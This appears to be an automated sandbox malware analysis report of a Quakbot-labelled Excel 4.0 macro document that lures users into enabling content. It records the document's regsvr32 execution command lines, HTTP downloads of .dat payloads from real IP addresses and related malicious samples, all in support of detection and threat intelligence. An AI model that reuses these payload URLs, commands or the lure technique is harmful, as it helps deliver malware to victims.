Windows Analysis Report Permission-40776837-06252021.xlsm

Overview

General Information

Sample Name: Permission-40776837-06252021.xlsm
Analysis ID: 440654
MD5: 2cd2fd004b5589a595239f202ac648ae
SHA1: ac02da8a953fd89f325c64bf5df93e415350ec12
SHA256: ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
Tags: xlsm

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1980 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3064 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3028 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1464, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 1980

Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; TCP traffic: 192.168.2.22:49169 -> 185.183.99.120:80
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 185.240.103.219:80
Source: Joe Sandbox View; IP Address: 190.14.37.3
Source: Joe Sandbox View; IP Address: 185.183.99.120
Source: global traffic; HTTP traffic detected:
  GET /44372.7795725694.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 185.183.99.120
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 185.240.103.219 (reported 6 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 190.14.37.3 (reported 6 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 185.183.99.120 (reported 6 times)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83F8E7CF.jpg
Source: global traffic; HTTP traffic detected: GET /44372.7795725694.dat HTTP/1.1 to Host: 185.183.99.120 (the same request and headers as listed above)
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2228124469.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2208878206.0000000001D40000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 4; Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A EC DO I '0
Source: Screenshot number: 8; Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th
Source: Screenshot number: 8; Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A mMWj
Source: Document image extraction number: 0; Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0; Screenshot OCR: Enable Content
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1; Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulas
Source: Permission-40776837-06252021.xlsm; Initial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRB96F.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: Permission-40776837-06252021.xlsm; Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-40776837-06252021.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-40776837-06252021.xlsm; Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (reported 24 times)
Source: C:\Windows\System32\regsvr32.exe; Process information set: NOOPENFILEERRORBOX (reported 3 times)
Source: C:\Windows\System32\regsvr32.exe TID: 2224; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1616; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1604; Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

The matrix is listed here per tactic column. A number in parentheses after a technique is the superscript shown in the report's matrix, i.e. the count of signatures in this analysis that map to that technique; techniques without a number are the matrix's unmatched placeholders.

  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
  • Execution: Scripting (1), Exploitation for Client Execution (22), At (Linux), At (Windows), Cron
  • Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
  • Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (1), Scripting (1)
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
  • Discovery: Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Information Discovery (2), System Network Configuration Discovery, Remote System Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
  • Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
  • Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (11), Ingress Tool Transfer (2), Protocol Impersonation, Fallback Channels
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Behavior Graph


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source, detection, scanner and label:

  • Permission-40776837-06252021.xlsm: 5%, Virustotal
  • Permission-40776837-06252021.xlsm: 4%, ReversingLabs, label: Document-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source, detection, scanner and label (each URL is listed once here; the report repeats the URL Reputation entries once per memory dump in which the string was found):

  • http://www.%s.comPA: 0%, URL Reputation, safe
  • http://www.icra.org/vocabulary/.: 0%, URL Reputation, safe
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true: 0%, URL Reputation, safe
  • http://servername/isapibackend.dll: 0%, Avira URL Cloud, safe
  • http://185.183.99.120/44372.7795725694.dat: 0%, Avira URL Cloud, safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name, malicious flag, antivirus detection and reputation:

  • http://185.183.99.120/44372.7795725694.dat: malicious: false; Avira URL Cloud: safe; reputation: unknown

URLs from Memory and Binaries

Name, source memory dumps, malicious flag, antivirus detection and reputation:

  • http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://www.windows.com/pctv.
    Source: regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://investor.msn.com
    Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://www.msnbc.com/news/ticker.txt
    Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://www.%s.comPA
    Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmp; malicious: false; URL Reputation: safe; reputation: low
  • http://www.icra.org/vocabulary/.
    Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; malicious: false; URL Reputation: safe; reputation: unknown
  • http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmp; malicious: false; URL Reputation: safe; reputation: unknown
  • http://www.hotmail.com/oe
    Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; malicious: false; reputation: high
  • http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000003.00000002.2228124469.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2208878206.0000000001D40000.00000002.00000001.sdmp; malicious: false; Avira URL Cloud: safe; reputation: low
  • http://investor.msn.com/
    Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmp; malicious: false; reputation: high

Contacted IPs

Public

IP, domain, country, ASN, ASN name and malicious flag:

  • 190.14.37.3: domain unknown; Panama; ASN 52469 (OffshoreRacksSAPA); malicious: false
  • 185.183.99.120: domain unknown; Netherlands; ASN 60117 (HSAE); malicious: false
  • 185.240.103.219: domain unknown; Russian Federation; ASN 57724 (DDOS-GUARDRU); malicious: false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 440654
Start date: 25.06.2021
Start time: 18:42:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Permission-40776837-06252021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.evad.winXLSM@7/7@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Max analysis timeout: 220s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

Simulations

Behavior and APIs

  • Time: 18:43:28; Type: API Interceptor; Description: 3x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Matched IP, then for each match the associated sample name, its detection and the context URL:

  • 190.14.37.3
    • Permission-1984690372-06252021.xlsm: malicious; context: 190.14.37.3/44372.7746763889.dat
    • Permission-1532161794-06252021.xlsm: malicious; context: 190.14.37.3/44372.7722377315.dat
    • Permission-1984690372-06252021.xlsm: malicious; context: 190.14.37.3/44372.7698814815.dat
    • Permission-1532161794-06252021.xlsm: malicious; context: 190.14.37.3/44372.7671056713.dat
    • Permission-414467145-06252021.xlsm: malicious; context: 190.14.37.3/44372.593127662.dat
    • Permission-414467145-06252021.xlsm: malicious; context: 190.14.37.3/44372.5879460648.dat
  • 185.183.99.120
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.183.99.120/44372.7746763889.dat
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.183.99.120/44372.7722377315.dat
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.183.99.120/44372.7698814815.dat
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.183.99.120/44372.7671056713.dat
    • Permission-414467145-06252021.xlsm: malicious; context: 185.183.99.120/44372.593127662.dat
    • Permission-414467145-06252021.xlsm: malicious; context: 185.183.99.120/44372.5879460648.dat
  • 185.240.103.219
    • Permission-414467145-06252021.xlsm: malicious; context: 185.240.103.219/44372.593127662.dat
    • Permission-414467145-06252021.xlsm: malicious; context: 185.240.103.219/44372.5879460648.dat

Domains

No context

ASN

Matched ASN name, then for each match the associated sample name, its detection and the context IP:

  • DDOS-GUARDRU
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.240.103.219
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.240.103.219
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.240.103.219
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.240.103.219
    • Permission-414467145-06252021.xlsm: malicious; context: 185.240.103.219
    • Permission-414467145-06252021.xlsm: malicious; context: 185.240.103.219
    • Decline-172917164-06242021.xlsm: malicious; context: 5.253.62.174
    • Decline-172917164-06242021.xlsm: malicious; context: 5.253.62.174
    • ForceNitro.exe: malicious; context: 185.178.208.135
    • PO#8076.exe: malicious; context: 185.129.100.112
    • Cancellation_Letter_2137859823_06112021.xlsm: malicious; context: 185.240.103.162
    • Cancellation_Letter_2137859823_06112021.xlsm: malicious; context: 185.240.103.162
    • jebDtHCePK9feGL.exe: malicious; context: 185.129.100.112
    • EDS03932,pdf.exe: malicious; context: 185.178.208.160
    • PO_29_00412.exe: malicious; context: 185.178.208.160
    • PO_29_00412.exe: malicious; context: 185.178.208.160
    • 12042021493876783,xlsx.exe: malicious; context: 185.178.208.160
    • Ref. PDF IGAPO17493.exe: malicious; context: 5.253.61.31
    • AxR7BY4wzz.exe: malicious; context: 185.178.208.189
    • SecuriteInfo.com.Trojan.Siggen12.41502.7197.exe: malicious; context: 185.178.208.189
  • OffshoreRacksSAPA
    • Permission-1984690372-06252021.xlsm: malicious; context: 190.14.37.3
    • Permission-1532161794-06252021.xlsm: malicious; context: 190.14.37.3
    • Permission-1984690372-06252021.xlsm: malicious; context: 190.14.37.3
    • Permission-1532161794-06252021.xlsm: malicious; context: 190.14.37.3
    • Permission-414467145-06252021.xlsm: malicious; context: 190.14.37.3
    • Permission-414467145-06252021.xlsm: malicious; context: 190.14.37.3
    • 4cDyOofgzT.xlsm: malicious; context: 190.14.37.2
    • 4cDyOofgzT.xlsm: malicious; context: 190.14.37.2
    • 341288734918_06172021.xlsm: malicious; context: 190.14.37.2
    • 341288734918_06172021.xlsm: malicious; context: 190.14.37.2
    • Rebate_247668103_06142021.xlsm: malicious; context: 190.14.37.135
    • Rebate_247668103_06142021.xlsm: malicious; context: 190.14.37.135
    • Rebate_1963763550_06142021.xlsm: malicious; context: 190.14.37.135
    • Rebate_1963763550_06142021.xlsm: malicious; context: 190.14.37.135
    • Rebate_234359500_06142021.xlsm: malicious; context: 190.14.37.135
    • Rebate_234359500_06142021.xlsm: malicious; context: 190.14.37.135
    • banUwVSwBY.xlsx: malicious; context: 190.14.37.134
    • banUwVSwBY.xlsx: malicious; context: 190.14.37.134
    • Rebate_18082425_05272021.xlsm: malicious; context: 190.14.37.102
    • Rebate_18082425_05272021.xlsm: malicious; context: 190.14.37.102
  • HSAE
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.183.99.120
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.183.99.120
    • Permission-1984690372-06252021.xlsm: malicious; context: 185.183.99.120
    • Permission-1532161794-06252021.xlsm: malicious; context: 185.183.99.120
    • Permission-414467145-06252021.xlsm: malicious; context: 185.183.99.120
    • Permission-414467145-06252021.xlsm: malicious; context: 185.183.99.120
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                xa6FEoUw0W.dllGet hashmaliciousBrowse
                • 188.116.36.211
                tszs3mwUbe.exeGet hashmaliciousBrowse
                • 185.45.193.29
                pZ50mMKSLi.exeGet hashmaliciousBrowse
                • 185.45.193.29
                qTnwCotzR9.exeGet hashmaliciousBrowse
                • 185.45.193.29
                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                • 185.45.193.29
                aGDehjYIws.exeGet hashmaliciousBrowse
                • 185.198.57.204
                Tjhsm8p85Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                T23HJFoN2Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                i7NsO9mhTD.exeGet hashmaliciousBrowse
                • 185.45.193.29
                o7w2HSi17V.exeGet hashmaliciousBrowse
                • 185.141.27.225
                AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83F8E7CF.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                C:\Users\user\AppData\Local\Temp\61CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153114
                Entropy (8bit):7.6645083416981485
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO47t:cng4P4346PgZw9gQaB
                MD5:A426D91D65BBCD487AF2F9E280AF5CEE
                SHA1:69D0B820345DDFB4D58303F0EE5F82587B508033
                SHA-256:CDDC896ADF6465D4DD80B866469BE3197816C6E1FC1174394DB546DB35306890
                SHA-512:E39CC235BB3E9142B77872E793072EE4B8BF06C31B2ABC29AEA4B75AC2EB22B6F0296620DD73FCFFFE5D394516517BF04CDB7320042462BFF5D2C0FCCF6AD545
                Malicious:false
                Reputation:low
